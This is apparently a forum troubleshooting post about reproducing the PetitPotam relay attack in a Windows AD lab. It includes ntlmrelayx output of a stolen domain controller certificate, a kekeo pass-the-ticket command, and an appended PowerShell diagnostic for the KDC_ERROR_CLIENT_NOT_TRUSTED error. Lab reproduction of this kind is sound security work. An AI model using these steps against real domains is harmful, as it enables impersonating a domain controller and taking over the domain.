active directory – Trying to reproduce petitpotam exploit, got “KDC_ERROR_CLIENT_NOT_TRUSTED (62)” error

I’m following this article to reproduce the EFS bug: https://blog.truesec.com/2021/08/05/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory/

My environment:

  1. Windows 2016 AD (Hostname: W2016$)
  2. Windows 2016 SRV01 (Running AD CS service)
  3. Windows 2016 SRV02 (Attack machine)

I’ve successfully generated the certificate with ntlmrelayx:

(*) Skipping user W2016$ since attack was already performed
(*) GOT CERTIFICATE!
(*) Base64 certificate of user W2016$:
...

Then I logged in to SRV02 with a low-privilege user. When I pass the ticket in kekeo, it results in a KDC_ERROR_CLIENT_NOT_TRUSTED error:

# tgt::ask /pfx:xxx /user:W2016$ /domain:corp.aaron.com /ptt
...

Realm        : corp.xx.com (corp)
User         : W2016$ (W2016$)
CName        : W2016$   (KRB_NT_PRINCIPAL (1))
SName        : krbtgt/corp.xx.com    (KRB_NT_SRV_INST (2))
Need PAC     : Yes
Auth mode    : RSA
(kdc) name: W2016.corp.xx.com (auto)
(kdc) addr: 172.16.177.130 (auto)
KDC_ERROR_CLIENT_NOT_TRUSTED (62)

Does anyone know what’s wrong here?
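Added diagnostic, not part of the original post or of the truesec article: KDC_ERR_CLIENT_NOT_TRUSTED (62) is the KDC's answer when it cannot accept the PKINIT client certificate itself, so the check a practitioner would run before anything else is the same validation the DC performs: build the chain with online revocation checking, and confirm the issuing CA is in the NTAuth store as the DC sees it. The script below does that on the DC (W2016 in this lab); the pfx path and password are assumptions, as is the location you saved ntlmrelayx's base64 output to.

```powershell
<#
 Added diagnostic for KDC_ERR_CLIENT_NOT_TRUSTED; example code, not from the original post.
 Run in an elevated PowerShell on the DC that answered the AS-REQ (W2016 above), because the
 KDC validates the client certificate with its own chain engine and its own NTAuth cache.
 Assumptions: the pfx decoded from ntlmrelayx's base64 output is at $PfxPath, protected by
 $PfxPassword (leave empty if the pfx has no password).
#>
param(
    [string]$PfxPath     = 'C:\lab\W2016.pfx',   # assumed path, change to yours
    [string]$PfxPassword = ''                    # assumed; empty if the pfx is unprotected
)

$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2($PfxPath, $PfxPassword)

# 1. What the KDC sees on the leaf: PKINIT needs a Client Authentication EKU and maps the
#    principal from the SAN (UPN or DNS name), so print both.
'--- leaf certificate ---'
"Subject   : $($cert.Subject)"
"Issuer    : $($cert.Issuer)"
"Validity  : $($cert.NotBefore) -> $($cert.NotAfter)"
foreach ($ext in $cert.Extensions) {
    switch ($ext.Oid.Value) {
        '2.5.29.37' { "EKU       : $($ext.Format($false))" }   # Enhanced Key Usage
        '2.5.29.17' { "SAN       : $($ext.Format($false))" }   # Subject Alternative Name
    }
}

# 2. Can this host build and revocation-check the chain? An untrusted root or a CDP/AIA URL
#    the DC cannot reach shows up here as a ChainStatus entry.
$chain = New-Object System.Security.Cryptography.X509Certificates.X509Chain
$chain.ChainPolicy.RevocationMode = [System.Security.Cryptography.X509Certificates.X509RevocationMode]::Online
$chain.ChainPolicy.RevocationFlag = [System.Security.Cryptography.X509Certificates.X509RevocationFlag]::ExcludeRoot
$chainOk = $chain.Build($cert)
'--- chain ---'
"Build with online revocation: $chainOk"
foreach ($s in $chain.ChainStatus)   { "  problem: $($s.Status) $($s.StatusInformation.Trim())" }
foreach ($e in $chain.ChainElements) { "  element: $($e.Certificate.Subject)  [$($e.Certificate.Thumbprint)]" }

# 3. Is the issuing CA in NTAuth as replicated to this host? The DC caches the AD
#    NTAuthCertificates object under this key; subkey names are CA thumbprints.
$ntAuthKey = 'HKLM:\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates'
$ntAuth = @()
if (Test-Path $ntAuthKey) { $ntAuth = @((Get-ChildItem $ntAuthKey).PSChildName) }
'--- NTAuth ---'
"Cached NTAuth thumbprints on this host: $($ntAuth.Count)"
# ChainElements[0] is the leaf. The CA directly above it is the one the KDC must find in NTAuth;
# a standalone root further up is normally absent from NTAuth, which is fine.
for ($i = 1; $i -lt $chain.ChainElements.Count; $i++) {
    $ca = $chain.ChainElements[$i].Certificate
    "  $($ca.Subject): in NTAuth = $($ntAuth -contains $ca.Thumbprint)"
}

# 4. The built-in check that combines both: true only if the chain validates and ends in an
#    NTAuth CA.
'--- Test-Certificate -Policy NTAUTH ---'
Test-Certificate -Cert $cert -Policy NTAUTH
```

If step 3 shows the issuing CA missing from NTAuth, publish it from the CA host with `certutil -dspublish -f <ca.cer> NTAuthCA` and refresh the DC's cache (`certutil -pulse` or `gpupdate /force`) before retrying kekeo. If step 2 fails on revocation, the CDP/AIA URLs in the CA's certificate are what the DC, not the attack machine, has to be able to reach.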